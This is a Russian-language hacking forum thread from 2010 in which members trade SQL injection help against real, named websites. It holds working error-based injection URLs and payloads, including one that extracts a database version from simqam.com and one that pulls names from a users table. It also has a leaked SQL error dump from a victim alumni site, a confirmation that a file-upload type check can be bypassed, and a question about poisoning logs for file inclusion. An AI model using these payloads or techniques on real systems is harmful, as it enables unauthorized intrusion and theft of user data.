20.03.2010, 21:47
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Life7
Имеется такой код:
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?
Да.
|
|
|
20.03.2010, 23:45
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
http://www.simqam.com/products.php?cid=48%2b1=1
Последний раз редактировалось Darren; 21.03.2010 в 00:29..
|
|
|
|
21.03.2010, 00:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Darren
Никак не могу подобрать колонки, тич литл ступид асс холл плис
http://www.simqam.com/products.php?cid=48%2b1=1
Какбы там блайнд:
http://www.simqam.com/products.php?cid=1+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),floor(rand(0)*2)))--+
Result:
Duplicate entry ' 5.0.67-log1'
|
|
|
|
21.03.2010, 00:51
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
Сообщение от Tigger
Какбы там блайнд:
http://www.simqam.com/products.php?cid=1+or+(select+count(*)+from+(selec t+1+union+select+2+union+select+3)x+group+by+conca t(version(),floor(rand(0)*2)))--+
Result:
Duplicate entry '5.0.67-log1'
Sorry за возможно глупый вопрос
В блайндах всегда возможно только выводить по одной строке(значению) или есть такой запрос позволяющий выводить сразу столбом. FAQ я читал и не раз и не два
т.е. например я делаю такой запрос
+UNION+SELECT+*+FROM(SELECT%20*%20FROM%20(SELECT%2 0NAME_CONST((SELECT%20name%20FROM%20users%20LIMIT% 200,1),%2014)d)+as+t+JOIN(SELECT%20NAME_CONST((SEL ECT%20name%20FROM%20users%20LIMIT%200,1),14)e)b)a% 20--
выводит: Duplicate entry: qwerqwer
Выводит только одно значение хоть с лимитом, хоть без него можно ли вывести данные целиком?
|
|
|
|
21.03.2010, 08:49
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Нет, хотя стоп, я же выводил login  assword =\ |
|
|
|
21.03.2010, 09:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Мля, начал линки ис топика по скулям проверять ):
Мне интересно стало http://site:3306
Вопрос 1:
Как такое прыкрыть (рационально всмысле)!?
Вопрос 2:
Какие есть вариации каталога по умолчанию для выполнения cgi скриптов(и др. каталоги) у разных веб-серверов с компроментирующими даными ?
сgi-bin/test.pl - например , денвер.
результат - путь.
Админы завтыкуют удалять.
Воше не мешало б создать отдельный топик на этот вопрос и наверно предыдущий.
Хоть и лоловский метод, но уже есть и версия мускула и путь!
Последний раз редактировалось Strilo4ka; 21.03.2010 в 10:03..
|
|
|
|
21.03.2010, 11:59
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
Сообщение от Strilo4ka
Вопрос 1:
Как такое прыкрыть (рационально всмысле)!?
Вопрос 2:
Какие есть вариации каталога по умолчанию для выполнения cgi скриптов(и др. каталоги) у разных веб-серверов с компроментирующими даными ?
сgi-bin/test.pl - например , денвер.
результат - путь.
Ответ 1: фаервол.
Ответ 2: гугл. все не перечесть.
Сообщение от Strilo4ka
но уже есть и версия мускула и путь!
И ничего это не дает само по себе.
|
|
|
|
21.03.2010, 15:58
|
|
Новичок
Регистрация: 06.09.2008
Сообщений: 9
С нами:
9303774
Репутация:
0
|
|
Привет, как произвести инъекцию что бы вытащить хоть какую то инфу т.к не получается (новичок пока) урл палить не буду но вот какая ошибка:
warning: implode() [function.implode]: Bad arguments. in /home/rryan/public_html/alumni/sites/all/modules/views/views.module on line 1961. user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '='' at line 1 query: SELECT count( DISTINCT(node.nid)) FROM node node LEFT JOIN node bio ON node.uid = bio.uid AND bio.type = 'uprofile' LEFT JOIN content_type_uprofile bio_node_data_field_year_graduated_or_last_ye ON bio.vid = bio_node_data_field_year_graduated_or_last_ye.vid LEFT JOIN content_type_uprofile bio_node_data_field_name ON bio.vid = bio_node_data_field_name.vid LEFT JOIN users_roles users_roles ON node.uid = users_roles.uid INNER JOIN users users ON node.uid = users.uid LEFT JOIN content_type_uprofile bio_node_data_field_full_name ON bio.vid = bio_node_data_field_full_name.vid INNER JOIN node_access na ON na.nid = node.nid WHERE (na.grant_view >= 1 AND ((na.gid = 0 AND na.realm = 'all') OR (na.gid = 1 AND na.realm = 'workflow_access') OR (na.gid = 0 AND na.realm = 'workflow_access_owner'))) AND ( (bio.status = '1') AND (bio_node_data_field_year_graduated_or_last_ye.fie ld_year_graduated_or_last_ye_value IN ('1')) AND (node.type IN ('uprofile')) AND (()) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '=') ) in /home/rryan/public_html/alumni/includes/database.mysql.inc on line 174. user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '='' at line 1 query: SELECT DISTINCT(node.nid), bio_node_data_field_year_graduated_or_last_ye.fiel d_year_graduated_or_last_ye_value AS bio_node_data_field_year_graduated_or_last_ye_fiel d_year_graduated_or_last_ye_value, users.uid AS users_uid, bio.title AS bio_title, bio.changed AS bio_changed, bio_node_data_field_full_name.field_full_name_valu e AS bio_node_data_field_full_name_field_full_name_valu e, bio.nid AS bio_nid FROM node node LEFT JOIN node bio ON node.uid = bio.uid AND bio.type = 'uprofile' LEFT JOIN content_type_uprofile bio_node_data_field_year_graduated_or_last_ye ON bio.vid = bio_node_data_field_year_graduated_or_last_ye.vid LEFT JOIN content_type_uprofile bio_node_data_field_name ON bio.vid = bio_node_data_field_name.vid LEFT JOIN users_roles users_roles ON node.uid = users_roles.uid INNER JOIN users users ON node.uid = users.uid LEFT JOIN content_type_uprofile bio_node_data_field_full_name ON bio.vid = bio_node_data_field_full_name.vid INNER JOIN node_access na ON na.nid = node.nid WHERE (na.grant_view >= 1 AND ((na.gid = 0 AND na.realm = 'all') OR (na.gid = 1 AND na.realm = 'workflow_access') OR (na.gid = 0 AND na.realm = 'workflow_access_owner'))) AND ( (bio.status = '1') AND (bio_node_data_field_year_graduated_or_last_ye.fie ld_year_graduated_or_last_ye_value IN ('1')) AND (node.type IN ('uprofile')) AND (()) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '=') ) ORDER BY bio_node_data_field_year_graduated_or_last_ye_fiel d_year_graduated_or_last_ye_value ASC LIMIT 0, 26 in /home/rryan/public_html/alumni/includes/database.mysql.inc on line 174.
|
|
|
|
21.03.2010, 16:39
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
есть возможность инклюдить файл с логами. как туда записать свой код ? InetCrack`ом ?
|
|
|
|
21.03.2010, 21:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от budden
Ответ 1: фаервол.
Ответ 2: гугл. все не перечесть.
И ничего это не дает само по себе.
вот тут ты и не прав!!! сбор данных знаеш что такое, ну вот!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
